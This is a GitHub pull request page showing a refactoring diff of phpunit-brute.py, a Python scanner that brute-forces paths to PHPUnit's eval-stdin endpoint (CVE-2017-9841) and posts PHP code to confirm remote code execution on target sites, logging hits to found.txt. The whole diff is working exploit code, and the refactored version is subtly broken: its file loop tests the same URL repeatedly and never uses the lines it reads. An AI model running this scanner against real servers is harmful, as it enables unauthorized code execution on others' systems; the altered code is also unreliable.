Skip to content

Improve code quality #2

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
180 changes: 98 additions & 82 deletions phpunit-brute.py
Original file line number Diff line number Diff line change
@@ -1,106 +1,122 @@
#!/usr/bin/env python
#
#
#
#
# phpunit-brute.py - Finding paths to phpunit to gain RCE. (CVE-2017-9841)
#
# By @RandomRobbieBF
#
#

#
import requests
import sys
import argparse
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
session = requests.Session()


parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=False ,default="http://localhost",help="URL to test")
parser.add_argument("-f", "--file", default="",required=False, help="File of urls")
parser.add_argument("-p", "--proxy", default="",required=False, help="Proxy for debugging")

args = parser.parse_args()
url = args.url
urls = args.file
USER_AGENT = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0"


if args.proxy:
proxy = args.proxy
else:
proxy = ""



parser = argparse.ArgumentParser()
parser.add_argument(
"-u", "--url",
type=str,
required=False,
default="http://localhost",
help="URL to test"
)
parser.add_argument(
"-f", "--file",
type=str,
required=False,
help="File of urls"
)
parser.add_argument(
"-p", "--proxy",
type=str,
default="",
required=False,
help="Proxy for debugging"
)

http_proxy = proxy
proxyDict = {
"http" : http_proxy,
"https" : http_proxy,
"ftp" : http_proxy
}



def test_url(url, urlpath):
newurl = url + urlpath
rawBody = "<?php phpinfo();"
headers = {
"User-Agent": USER_AGENT,
"Connection": "close",
"Accept": "*/*",
"Content-Type": "application/x-www-form-urlencoded"
}
try:
response = session.post(newurl, headers=headers, verify=False,
data=rawBody, proxies=proxyDict, timeout=30)
if (response.status_code == 200) and\
("PHP License as published by the PHP Group" in response.text):
print("[+] Found RCE for {} [+]".format(newurl))
with open("found.txt", "a") as text_file:
text_file.write(newurl + "\n")
return True
else:
print("[-] No Luck for {} [-]".format(urlpath))
except Exception as e:
print("[-] Check Url might have Issues [-]")
print(e)
sys.exit(0)


def test_url(url,urlpath):
newurl = ""+url+""+urlpath+""
rawBody = "<?php phpinfo();"
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*","Content-Type":"application/x-www-form-urlencoded"}
try:
response = session.post(newurl, headers=headers,verify=False,data=rawBody, proxies=proxyDict,timeout=30)
if response.status_code == 200:
if "PHP License as published by the PHP Group" in response.text:
print("[+] Found RCE for "+newurl+" [+]")
text_file = open("found.txt", "a")
text_file.write(""+newurl+"\n")
text_file.close()
return True
else:
print("[-] No Luck for "+urlpath+" [-]")
else:
print("[-] No Luck for "+urlpath+" [-]")
except Exception as e:
print ("[-]Check Url might have Issues[-]")
print(e)
sys.exit(0)


def grab_paths(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"}
try:
response = session.get("https://raw.githubusercontent.com/random-robbie/bruteforce-lists/master/phpunit.txt", headers=headers,verify=False, proxies=proxyDict)
lines = response.text.strip().split('\n')
for urlpath in lines:
loop = test_url(url,urlpath)
if loop:
break
except Exception as e:
print("[-] Failed to obtain paths file [-]")
print(e)
sys.exit(0)

headers = {
"User-Agent": USER_AGENT,
"Connection": "close",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate"
}
try:
response = session.get(
"https://raw.githubusercontent.com/random-robbie/bruteforce-lists/master/phpunit.txt",
headers=headers,
verify=False,
proxies=proxyDict
)
lines = response.text.strip().splitlines()
for urlpath in lines:
loop = test_url(url, urlpath)
if loop:
break
except Exception as e:
print("[-] Failed to obtain paths file [-]")
print(e)
sys.exit(0)


if urls:
if os.path.exists(urls):
with open(urls, 'r') as f:
for line in f:
url = line.replace("\n","")
try:
print("Testing "+url+"")
grab_paths(url)
except KeyboardInterrupt:
print ("Ctrl-c pressed ...")
sys.exit(1)
except Exception as e:
print('Error: %s' % e)
pass
f.close()

if __name__ == "__main__":
args = parser.parse_args()
url = args.url
urls_file = args.file

else:
grab_paths(url)
session = requests.Session()
proxy = args.proxy
http_proxy = proxy
proxyDict = {
"http": http_proxy,
"https": http_proxy,
"ftp": http_proxy
}
try:
if urls_file and os.path.exists(urls_file):
with open(urls_file, 'r') as f:
lines = f.read().splitlines()
for line in lines:
try:
print("Testing " + url)
grab_paths(url)
except Exception as e:
print('Error: %s' % e)
pass
else:
grab_paths(url)
except KeyboardInterrupt:
print("\nCtrl-c pressed…")
sys.exit(1)